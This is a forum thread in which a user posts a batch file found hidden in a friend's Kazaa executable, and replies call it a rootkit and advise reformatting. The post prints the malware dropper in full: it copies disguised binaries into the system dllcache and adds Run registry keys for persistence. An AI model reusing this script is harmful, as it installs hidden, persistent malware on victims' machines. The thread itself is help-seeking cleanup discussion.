Results 1 to 9 of 9

Thread: r00ted?

  1. #1
    Senior Member Nemeliza's Avatar
    Join Date
    Jul 2003
    Posts
    1,719
    Thanks
    1
    Thanked
    5 times in 5 posts

    r00ted?

    Hey,

    Just been to a friends house to clean up his comp when after running adaware and removing 308 spy/adware applications
    I found this in a bat file hidden in his auto executing kazaa exe file.
    Code:
    @echo off
    
    mkdir %SystemRoot%\system32\dllcache\I386
    
    mkdir %systemroot%\system32\dllcache\I386\pax
    
    copy svchost.exe %SystemRoot%\system32\dllcache
    
    copy cygwin1.dll %SystemRoot%\system32\dllcache
    
    copy TzoLibr.dll %SystemRoot%\system32\dllcache
    
    copy libeay32.dll %SystemRoot%\system32\dllcache
    
    copy SPOOLSVC.exe %SystemRoot%\system32\dllcache
    
    copy ServUDaemon.ini %SystemRoot%\system32\dllcache
    
    copy ogm.dll %SystemRoot%\system32\dllcache\I386\pax
    
    del svchost.exe
    
    del cygwin1.dll
    
    del ogm.dll
    
    del SPOOLSVC.exe
    
    del TzoLibr.dll
    
    del libeay32.dll
    
    del ServUDaemon.ini
    
    reg add "hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v System /t REG_SZ /d "%SystemRoot%\system32\dllcache\svchost.exe -b %SystemRoot%\system32\dllcache\I386\pax\ogm.dll" /f
    
    reg add "hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SystemData /t REG_SZ /d "%SystemRoot%\system32\dllcache\SPOOLSVC.exe" /f
    
    call klr247.exe
    
    del ogm.bat
    
    cd %SystemRoot%\system32\dllcache
    SPOOLSVC.exe
    After laughing and telling him he has been rooted...he responded with 'iv been what now'
    I have found all the files it copied aswell as the directory and the registry keys and just wanted to know if its ok to just delete it all. Is there anyting else hidden in here that requires special attention???

    Thanks.

  2. #2
    Comfortably Numb directhex's Avatar
    Join Date
    Jul 2003
    Location
    /dev/urandom
    Posts
    17,074
    Thanks
    228
    Thanked
    1,027 times in 678 posts
    • directhex's system
      • Motherboard:
      • Asus ROG Strix B550-I Gaming
      • CPU:
      • Ryzen 5900x
      • Memory:
      • 64GB G.Skill Trident Z RGB
      • Storage:
      • 2TB Seagate Firecuda 520
      • Graphics card(s):
      • EVGA GeForce RTX 3080 XC3 Ultra
      • PSU:
      • EVGA SuperNOVA 850W G3
      • Case:
      • NZXT H210i
      • Operating System:
      • Ubuntu 20.04, Windows 10
      • Monitor(s):
      • LG 34GN850
      • Internet:
      • FIOS
    nope, they're all critical operating system files which have been replaced with virus-infected versions - or more to the point, the backups have been altered, and the originals deleted so widnows automatically synchs to the infected versions

    101% rooted

    format is the only way






    nice rootkit! /me is impressed

  3. #3
    Chaos Monkey Apex's Avatar
    Join Date
    Jul 2003
    Location
    Huddersfield
    Posts
    4,528
    Thanks
    957
    Thanked
    233 times in 163 posts
    • Apex's system
      • Motherboard:
      • Asus Z87M-PLUS
      • CPU:
      • Intel i5-4670K
      • Memory:
      • 32 GiB
      • Storage:
      • 14 TiB
      • Graphics card(s):
      • R9 480X 8Gib
      • PSU:
      • 750
      • Case:
      • Core View 21
      • Operating System:
      • Windows 10 pro
      • Monitor(s):
      • Dell S2721DGFA
      • Internet:
      • 200Mb nTL Cable
    Unless he cba to copy ones from a uninfected machine format is the only way



  4. #4
    Comfortably Numb directhex's Avatar
    Join Date
    Jul 2003
    Location
    /dev/urandom
    Posts
    17,074
    Thanks
    228
    Thanked
    1,027 times in 678 posts
    • directhex's system
      • Motherboard:
      • Asus ROG Strix B550-I Gaming
      • CPU:
      • Ryzen 5900x
      • Memory:
      • 64GB G.Skill Trident Z RGB
      • Storage:
      • 2TB Seagate Firecuda 520
      • Graphics card(s):
      • EVGA GeForce RTX 3080 XC3 Ultra
      • PSU:
      • EVGA SuperNOVA 850W G3
      • Case:
      • NZXT H210i
      • Operating System:
      • Ubuntu 20.04, Windows 10
      • Monitor(s):
      • LG 34GN850
      • Internet:
      • FIOS
    spoolsvc.exe is the printer back-end, svchost.exe is the service host exe & runs _EVERYTHING_ under nt.

  5. #5
    Chaos Monkey Apex's Avatar
    Join Date
    Jul 2003
    Location
    Huddersfield
    Posts
    4,528
    Thanks
    957
    Thanked
    233 times in 163 posts
    • Apex's system
      • Motherboard:
      • Asus Z87M-PLUS
      • CPU:
      • Intel i5-4670K
      • Memory:
      • 32 GiB
      • Storage:
      • 14 TiB
      • Graphics card(s):
      • R9 480X 8Gib
      • PSU:
      • 750
      • Case:
      • Core View 21
      • Operating System:
      • Windows 10 pro
      • Monitor(s):
      • Dell S2721DGFA
      • Internet:
      • 200Mb nTL Cable
    WinInternals Admin pack would allow him to replace the files.



  6. #6
    Sublime HEXUS.net
    Join Date
    Jul 2003
    Location
    The Void.. Floating
    Posts
    11,819
    Thanks
    213
    Thanked
    233 times in 160 posts
    • Stoo's system
      • Motherboard:
      • Mac Pro
      • CPU:
      • 2*Xeon 5450 @ 2.8GHz, 12MB Cache
      • Memory:
      • 32GB 1600MHz FBDIMM
      • Storage:
      • ~ 2.5TB + 4TB external array
      • Graphics card(s):
      • ATI Radeon HD 4870
      • Case:
      • Mac Pro
      • Operating System:
      • OS X 10.7
      • Monitor(s):
      • 24" Samsung 244T Black
      • Internet:
      • Zen Max Pro
    "replace" would work too
    (\__/)
    (='.'=)
    (")_(")

  7. #7
    Comfortably Numb directhex's Avatar
    Join Date
    Jul 2003
    Location
    /dev/urandom
    Posts
    17,074
    Thanks
    228
    Thanked
    1,027 times in 678 posts
    • directhex's system
      • Motherboard:
      • Asus ROG Strix B550-I Gaming
      • CPU:
      • Ryzen 5900x
      • Memory:
      • 64GB G.Skill Trident Z RGB
      • Storage:
      • 2TB Seagate Firecuda 520
      • Graphics card(s):
      • EVGA GeForce RTX 3080 XC3 Ultra
      • PSU:
      • EVGA SuperNOVA 850W G3
      • Case:
      • NZXT H210i
      • Operating System:
      • Ubuntu 20.04, Windows 10
      • Monitor(s):
      • LG 34GN850
      • Internet:
      • FIOS
    it's not a production-vital server, just format the bastard :|

  8. #8
    Sublime HEXUS.net
    Join Date
    Jul 2003
    Location
    The Void.. Floating
    Posts
    11,819
    Thanks
    213
    Thanked
    233 times in 160 posts
    • Stoo's system
      • Motherboard:
      • Mac Pro
      • CPU:
      • 2*Xeon 5450 @ 2.8GHz, 12MB Cache
      • Memory:
      • 32GB 1600MHz FBDIMM
      • Storage:
      • ~ 2.5TB + 4TB external array
      • Graphics card(s):
      • ATI Radeon HD 4870
      • Case:
      • Mac Pro
      • Operating System:
      • OS X 10.7
      • Monitor(s):
      • 24" Samsung 244T Black
      • Internet:
      • Zen Max Pro
    Because it might not be practical to flatten it?
    (\__/)
    (='.'=)
    (")_(")

  9. #9
    Commander Keen
    Join Date
    Nov 2003
    Location
    217.27.240.214
    Posts
    624
    Thanks
    0
    Thanked
    0 times in 0 posts
    yeah.. and install a firewall !! And run spybot first thing before going on the net so that it can do the adware "hardening" <- *sniggers*

    then make the bugger use firefox because it r0x and it blocks !

    Then install skype, and get a microphone because I want somebody to try it out with !!!

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •